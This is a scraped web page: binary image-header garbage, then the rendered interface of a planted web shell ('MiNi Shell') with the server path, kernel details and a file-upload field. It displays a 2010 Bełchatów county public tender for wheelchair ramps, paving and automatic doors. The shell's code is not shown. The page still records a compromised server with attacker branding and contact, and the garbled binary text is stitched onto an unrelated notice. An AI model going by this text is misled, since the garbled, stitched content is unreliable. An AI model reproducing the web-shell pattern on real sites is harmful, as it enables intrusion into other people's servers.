JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100907/243281-N-2010.html

<p class="kh_header"><b>Bełchatów: Likwidacja barier architektonicznych w budynku Centrum Kształcenia Praktycznego w Bełchatowie</b><br>
<b>Numer ogłoszenia: 243281 - 2010; data zamieszczenia: 07.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Likwidacja barier architektonicznych w budynku Centrum Kształcenia Praktycznego w Bełchatowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem opracowania jest likwidacja barier architektonicznych w obiekcie Centrum
Kształcenia Praktycznego w Bełchatowie polegająca na wykonaniu dwóch podjazdów dla osób
niepełnosprawnych. Podjazdy zlokalizowane są przy wejściu głównym do Centrum Kształcenia
Praktycznego oraz przy wejściu do biblioteki. Dodatkowo przewidziano wymianę nawierzchni
chodnika i placu przed wejściem głównym oraz montaż nowych drzwi zewnętrznych
dwuskrzydłowych z mechanizmem rozsuwającym oba skrzydła, a także zmianę kierunku
otwierania się bramy wejściowej. Zaprojektowano również wykonanie dodatkowego podłoża pod
stojak dla rowerów przy budynku biblioteki.
Zakres robót obejmuje:
1. Roboty rozbiórkowe i demontażowe.
Przed przystąpieniem do robót demontażowych należy zabezpieczyć obiekty roślinne (ewentualnie
przesadzić w inne miejsce). Przewidziano skucie wszystkich nawierzchni betonowych przy obu
wejściach do budynku oraz zdjęcie chodnika z płytek betonowych wraz z krawężnikami.
Dodatkowo przy wejściu głównym należy zdemontować dwie ławki.
2. Roboty ziemne. 
Pod fundamenty podjazdu oraz fundament tarasu przed biblioteką przewidziano wykonanie
wykopów. Dodatkowo należy wybrać ziemię znajdującą się na głębokości 25 cm pod rozebranymi
nawierzchniami betonowymi oraz ziemię pod podjazdem. Wybraną ziemię pod podjazdem należy
zastąpić zagęszczoną podsypką piaskowo-żwirową grubości 42 cm.
3. Podjazd dla niepełnosprawnych. 
1) Podjazd pod wejście główne:
Zaprojektowano podjazd w kształcie litery L o długości całkowitej 13,95m, szerokości w świetle
1,2m i spadku 6%; różnica wysokości między poziomem terenu a wejściem do budynku wynosi
77cm. Na podjeździe znajduje się spocznik zlokalizowany na łuku. Spocznik wykonany jest
z poprzecznym spadkiem 1% w kierunku wewnętrznej podpory celem odprowadzenia wody.
Konstrukcje podjazdu wykonano w całości z betonu klasy C20/25 z 3% dodatkiem Admix Penetron
zabezpieczającym przed zawilgoceniem. Przyjęto zbrojenie główne ze stali żebrowanej o12
i strzemiona ze stali gładkiej o6. Betonowe podpory konstrukcyjne wspierają się na fundamencie
żelbetowym o przekroju 25x25cm. Dodatkowo w dwóch miejscach podjazdu zaprojektowano
stężenia poprzeczne żelbetowe o przekroju 20x20cm trwale połączone z wieńcem żelbetowym oraz
z fundamentami. Pomiędzy podporami znajduje się podsypka piaskowo-żwirowa będąca
stabilizacją pod kolejne warstwy podbudowy. Podbudowę stanowi podsypka z tłucznia grubości
20cm oraz podkład betonowy grubości 7cm. Podbudowy te są oddzielone od podsypki piaskowożwirowej
i konstrukcji geowłókniną. Jako nawierzchnię zaprojektowano kostkę brukową betonową
Bruk-Bet multigran typ Creativ w kolorach rubinowym i grafitowym o grubości 6cm układaną
bezpośrednio na podkładzie betonowym. Jako zabezpieczenie przyjęto balustradę ze stali
nierdzewnej wraz z pochwytami usytuowanymi w odległości 106 cm między sobą przystosowanymi
dla osób niepełnosprawnych. Przyjęto słupki balustrady w rozstawie co 120cm
mocowane do podłoża stalowymi kotwami rozprężnymi M12. Powierzchnię zewnętrzną konstrukcji
murowych i żelbetonowych ponad terenem wykończono dekoracyjnym tynkiem żywicznym typu
MARMOLIT jasnobrązowym.
2) Podjazd pod wejście do biblioteki:
Zaprojektowano podjazd w kształcie litery U o długości całkowitej 21,4m, szerokości w świetle
1,2m i spadku 6%, różnica wysokości między poziomem terenu a wejściem do budynku wynosi
100cm. Na podjeździe znajdują się dwa spoczniki zlokalizowane na łukach. Spoczniki wykonane są
z poprzecznym spadkiem 1% w kierunku wewnętrznej podpory celem odprowadzenia wody.
Przyjęto podpory z bloczków betonowych grubości 25 cm po skrajnych stronach podjazdu. Podpory
wspierają się na fundamencie żelbetowym o przekroju 25x25cm . Podpory zwieńczone są wieńcem
żelbetowym, który pełni funkcje stężenia podłużnego. Dodatkowo w czterech miejscach podjazdu
zaprojektowano stężenia poprzeczne żelbetowe o przekroju 20x20cm trwale połączone z wieńcem
żelbetowym oraz z fundamentami. Przyjęto beton klasy C20/25 z 3% dodatkiem Admix Penetron
zabezpieczającym przed zawilgoceniem oraz zbrojenie główne ze stali żebrowanej o12 i strzemiona
ze stali gładkiej o6. 5 Pomiędzy podporami znajduje się podsypka piaskowa będąca stabilizacją pod
kolejne warstwy podbudowy. Podbudowę stanowi podsypka z tłucznia grubości 20cm oraz podkład
betonowy grubości 7cm. Podbudowy te są oddzielone od podsypki piaskowej i konstrukcji
geowłókniną. Jako nawierzchnię zaprojektowano kostkę brukową betonową Bruk-Bet multigran typ
Creativ w kolorach rubinowym i grafitowym układaną bezpośrednio na podkładzie betonowym.
Jako zabezpieczenie przyjęto balustradę ze stali nierdzewnej wraz z pochwytami usytuowanymi
w odległości 106 cm między sobą- przystosowanymi dla osób niepełnosprawnych. Przyjęto słupki
balustrady w rozstawie co 120cm mocowane do podłoża kotwami rozprężnymi M12. Powierzchnię
zewnętrzną ponad terenem wykończono tynkiem strukturalnym typu MARMOLIT jasnobrązowym.
4. Ułożenie nawierzchni z kostki.
Nawierzchnie przed wejściem do budynku głównego:
W miejscu starego placu betonowego przed wejściem głównym zaprojektowano nawierzchnię
z kostki brukowej betonowej. Jako podbudowę przyjęto podkład z tłucznia grubości 20cm oraz
podkład betonowy grubości 7cm. Przyjęto kostkę brukową betonową Bruk-Bet multigran typ
Creativ w kolorach rubinowym i grafitowym. Obrzeża placu należy wykończyć krawężnikiem
betonowym. W podcieniu wejścia głównego należy zamocować stojak do rowerów.
Nawierzchnie przed wejściem do biblioteki:
Zaprojektowano nawierzchnię z kostki brukowej betonowej Bruk-Bet multigran typ Creativ
w kolorach rubinowym i grafitowym, przekrywającą chodnik prowadzący do budynku
z uwzględnieniem schodów. Jako podbudowę przyjęto podkład z tłucznia grubości 20cm oraz
podkład betonowy grubości 7cm- całość jest oddzielona od podłoża geowłókniną. Obrzeża
chodnika należy wykończyć krawężnikiem betonowym.
Taras przed wejściem do biblioteki:
Długość tarasu należy wydłużyć celem stworzenia miejsca pod stojak na rowery. Jako konstrukcję
należy przyjąć płytę żelbetową grubości 10 cm opartą na ścianach fundamentowych grubości 25 cm
usytuowanych wzdłuż płyty, równolegle do istniejącego budynku. Ściany fundamentowe wsparte są
na fundamencie żelbetowym o przekroju poprzecznym 25x25 cm. Jako zbrojenie tarasu przyjęto
siatkę zgrzewaną o8 o rozstawie 15x15 cm w dwóch warstwach. Zbrojenie ścian fundamentowych
i fundamentu: pręty główne ze stali żebrowanej o12, strzemiona ze stali gładkiej o6. Przyjęto beton
klasy C16/20.
5. Wymiana drzwi i zmiana kierunku otwierania się bramy wejściowej.
Założono wymianę drzwi zewnętrznych budynku głównego. Przyjęto drzwi dwuskrzydłowe
z automatycznym rozsuwaniem obu skrzydeł i zainstalowanym czujnikiem ruchu. Wymiary
skrzydła drzwiowego: 80x205cm. Należy skuć fragment murku w sąsiedztwie starych
demontowanych drzwi tak aby zaistniała możliwość swobodnego rozsuwania się skrzydeł. W razie
potrzeby konstrukcję osłonowej ściany dookoła drzwi należy wzmocnić. Mechanizm otwierania
drzwi należy zasilić w energię elektryczną najbliższego dostępnego miejsca spełniając
obowiązujące normy i przepisy. Przyjęto również zmianę kierunku otwierania bramy wejściowej do
głównego budynku tak aby otwarte jej skrzydło nie blokowało nowoprojektowanego podjazdu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7, 45.23.32.22-1, 45.42.11.31-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości 4.000,00 zł
(słownie: cztery tysiące złotych 00/100).
2. Wadium musi być wniesione przed upływem terminu składania ofert wskazanym
w pkt 12.1 SIWZ.
3. Wykonawca może wnieść wadium w jednej lub kilku następujących formach:
1) pieniądzu, przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Bełchatowie 64 8965 0008 2001 0005 5273 0003 z adnotacją: WADIUM PRZETARGOWE - Likwidacja barier architektonicznych w budynku Centrum
Kształcenia Praktycznego w Bełchatowie,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo
- kredytowej, z tym że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007r. Nr 42, poz. 275 z późn, zm.).
4. Jeżeli wadium zostanie wniesione w pieniądzu, Wykonawca dołączy do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanej wpłaty. W pozostałych przypadkach wymagane jest
dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, o których
mowa w pkt 3 ppkt 2-5 muszą zachowywać ważność przez cały okres, w którym Wykonawca jest
związany ofertą.
5. Wadium udzielone w innej formie niż pieniężna winno być wystawione na: Powiat
Bełchatowski reprezentowany przez Zarząd Powiatu, ul. Pabianicka 17/19, 97-400 Bełchatów.
6. Oryginał dokumentu wadium udzielonego w innej formie niż pieniężna należy dołączyć
do oferty.
7. Zamawiający będzie dokonywał zwrotu wadium zgodnie z zasadami określonymi w art. 46
ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p.
(załącznik nr 2 do SIWZ). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca
spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą
dokumentów, o których mowa w pkt 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p.
(załącznik nr 2 do SIWZ). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca
spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą
dokumentów, o których mowa w pkt 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p.
(załącznik nr 2 do SIWZ). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca
spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą
dokumentów, o których mowa w pkt 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p.
(załącznik nr 2 do SIWZ) oraz oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu
zamówienia posiadają wymagane uprawnienia (załącznik nr 4 do SIWZ). Warunek w zakresie
uprawnień zostanie uznany za spełniony jeżeli wykonawca oświadczy, że co najmniej jedna osoba,
która będzie uczestniczyć w wykonaniu zamówienia posiada uprawnienia budowlane
do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, bez ograniczeń
lub w ograniczonym zakresie i posiada zaświadczenie o wpisie do właściwej izby samorządu
zawodowego. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca
spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą
dokumentów, o których mowa w pkt 6 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca przedłoży oświadczenie z art. 44 P.z.p.
(załącznik nr 2 do SIWZ). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca
spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą
dokumentów, o których mowa w pkt 6 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - z wykorzystaniem wzoru określonego w załączniku nr 1 do SIWZ,
2. dowód wniesienia wadium,
3. druk wykazu części zamówienia, które Wykonawca zamierza zlecić podwykonawcom
- z wykorzystaniem wzoru stanowiącego załącznik nr 6 do SIWZ (jeżeli dotyczy).
4. kosztorys ofertowy opracowany metodą kalkulacji szczegółowej zgodnie
z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie
określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania
planowanych kosztów robót budowlanych określonych w programie funkcjonalno -
użytkowym (Dz. U. z 2004 r. Nr 130 poz. 1389).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana istotnych postanowień zawartej Umowy po jej zawarciu w stosunku do treści oferty złożonej przez Wykonawcę jest dopuszczalna przy zachowaniu następujących warunków:
1) przedmiotu zamówienia, pod warunkiem, że będą one na korzyść Zamawiającego albo
zaszły okoliczności których nie można było przewidzieć w chwili zawarcia Umowy,
2) terminu wykonania umowy, pod warunkiem, że zaszły okoliczności, których nie można
było przewidzieć w chwili zawarcia umowy, w szczególności:
a) w następstwie wykraczających poza terminy określone w Kodeksie Postępowania
Administracyjnego procedur administracyjnych oraz innych terminów formalno -
prawnych mających wpływ na terminy realizacji zamówienia,
b) działania siły wyższej.
3) wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla
Zamawiającego lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu
zamówienia,
4) Zamawiający postanowił zmienić zakres realizowanego zamówienia bądź inne
postanowienia Umowy ze względu na nowe okoliczności, o których nie wiedział
zawierając Umowę .
Wszelkie zmiany Umowy pod rygorem nieważności wymagają formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl/start/46<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo
Powiatowe w Bełchatowie, ul. Pabianicka 17/19, 97-400 Bełchatów, Wydział Zamówień
Publicznych i Inwestycji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2010 godzina 10:00, miejsce: Starostwo Powiatowe w Bełchatowie ul. Pabianicka 17/19,
97- 400 Bełchatów, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com